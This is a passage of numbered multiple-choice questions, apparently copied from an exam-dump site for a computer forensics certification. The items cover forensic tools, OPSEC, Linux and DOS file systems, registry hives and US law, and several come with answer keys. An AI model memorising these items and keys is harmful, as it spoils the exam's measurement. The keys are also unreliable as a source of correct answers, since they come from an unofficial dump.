NEW QUESTION: 291 Which of the following is used to back up forensic evidences or data folders from the network or locally attached hard disk drives? A. WinHex B. FAR system C. Vedit D. Device Seizure Answer: (SHOW ANSWER)

NEW QUESTION: 292 Which of the following are known as the three laws of OPSEC? Each correct answer represents a part of the solution. Choose three. A. If you are not protecting it (the critical and sensitive information), the adversary wins! B. If you don't know what to protect, how do you know you are protecting it? C. If you don't know about your security resources you cannot protect your network. D. If you don't know the threat, how do you know what to protect? Answer: A,B,D (LEAVE A REPLY)

NEW QUESTION: 293 Which of the following tools is used to locate lost files and partitions to restore data from a formatted, damaged, or lost partition in Windows and Apple Macintosh computers? A. File Scavenger B. Recover4all Professional C. Easy-Undelete D. VirtualLab Answer: (SHOW ANSWER)

NEW QUESTION: 294 Which of the following is the Windows feature on which the file management can be performed by a PC user? A. Finder B. Windows Explorer C. Task Manager D. Activity Monitor Answer: (SHOW ANSWER)

NEW QUESTION: 295 What is the name of the Secondary IDE slave, fourth partition in Linux operating system according to the Linux naming convention? A. SDB3 B. HDD4 C. HDA4 D. HDC4 Answer: B (LEAVE A REPLY)

NEW QUESTION: 296 Which of the following command line tools are available in Helix Live acquisition tool on Windows? Each correct answer represents a complete solution. Choose all that apply. A. ipconfig B. whois C. .cab extractors D. netstat Answer: A,C,D (LEAVE A REPLY)

NEW QUESTION: 297 Adam works as a professional Computer Hacking Forensic Investigator, a project has been assigned to him to investigate and examine files present on suspect's computer. Adam uses a tool with the help of which he can examine recovered deleted files, fragmented files, and other corrupted data. He can also examine the data, which was captured from the network, and access the physical RAM, and any processes running in virtual memory with the help of this tool. Which of the following tools is Adam using? A. HxD B. WinHex C. Vedit D. Evidor Answer: B (LEAVE A REPLY)

NEW QUESTION: 298 You work as a Network Administrator for uCertify Inc. You want to edit the MSDOS.SYS file, in your computer, from the DOS prompt. You are unable to find the file. What is the most likely cause? A. It is a read-only file. B. Someone has deleted the file. C. It is a hidden file. D. It is a built-in command in the COMMAND.COM file. Answer: C (LEAVE A REPLY)

NEW QUESTION: 299 John works as a Network Administrator for Perfect Solutions Inc. The company has a Linux- based network. John is working as a root user on the Linux operating system. Which of the following commands will John use to display information about all mounted file systems? Each correct answer represents a complete solution. Choose all that apply. A. df B. df -m C. ls D. du Answer: A,B (LEAVE A REPLY)

NEW QUESTION: 300 Which of the following types of computers is used for attracting potential intruders? A. Bastion host B. Files pot C. Honey pot D. Data pot Answer: (SHOW ANSWER)

NEW QUESTION: 301 Which of the following directories contains administrative commands on a UNIX computer? A. /bin B. /usr/local C. /sbin D. /export Answer: (SHOW ANSWER)

NEW QUESTION: 302 Adrian, the Network Administrator for Peach Tree Inc., wants to install a new computer on the company's network. He asks his assistant to make a boot disk with minimum files. The boot disk will be used to boot the computer, which does not have an operating system installed, yet. Which of the following files will he include on the disk? A. IO.SYS, MSDOS.SYS, COMMAND.COM, and FDISK. B. IO.SYS, MSDOS.SYS, COMMAND.COM, and AUTOEXEC.BAT. C. IO.SYS, MSDOS.SYS, COMMAND.COM, and CONFIG.SYS. D. IO.SYS, MSDOS.SYS, and COMMAND.COM. Answer: D (LEAVE A REPLY)

NEW QUESTION: 303 Which of the following layers protocols handles file transfer and network management? A. Transport B. Session C. Presentation D. Application Answer: D (LEAVE A REPLY)

NEW QUESTION: 304 You are handling technical support calls for an insurance company. A user calls you complaining that he cannot open a file, and that the file name appears in green while opening in Windows Explorer. What does this mean? A. The file belongs to another user. B. The file is infected with virus. C. The file is encrypted. D. The file is compressed. Answer: C (LEAVE A REPLY)

NEW QUESTION: 305 An organization monitors the hard disks of its employees' computers from time to time. Which policy does this pertain to? A. Privacy policy B. User password policy C. Backup policy D. Network security policy Answer: A (LEAVE A REPLY)

NEW QUESTION: 306 Which of the following registry hives stores information about the file extensions that are mapped to their corresponding applications? A. HKEY_LOCAL_MACHINE B. HKEY_CURRENT_USER C. HKEY_USERS D. HKEY_CLASSES_ROOT Answer: D (LEAVE A REPLY)

NEW QUESTION: 307 Which of the following fsck commands will you use to check all filesystems listed in /etc/fstab? A. fsck -f B. fsck -P C. fsck -A D. fsck -y Answer: C (LEAVE A REPLY)

NEW QUESTION: 308 Which of the following Acts enacted in United States allows the FBI to issue National Security Letters (NSLs) to Internet service providers (ISPs) ordering them to disclose records about their customers? A. Computer Fraud and Abuse Act B. Wiretap Act C. Economic Espionage Act of 1996 D. Electronic Communications Privacy Act of 1986 Answer: (SHOW ANSWER)

NEW QUESTION: 309 Which of the following types of cyber stalking damage the reputation of their victim and turn other people against them by setting up their own Websites, blogs or user pages for this purpose? A. False accusations B. Attempts to gather information about the victim C. False victimization D. Encouraging others to harass the victim Answer: (SHOW ANSWER)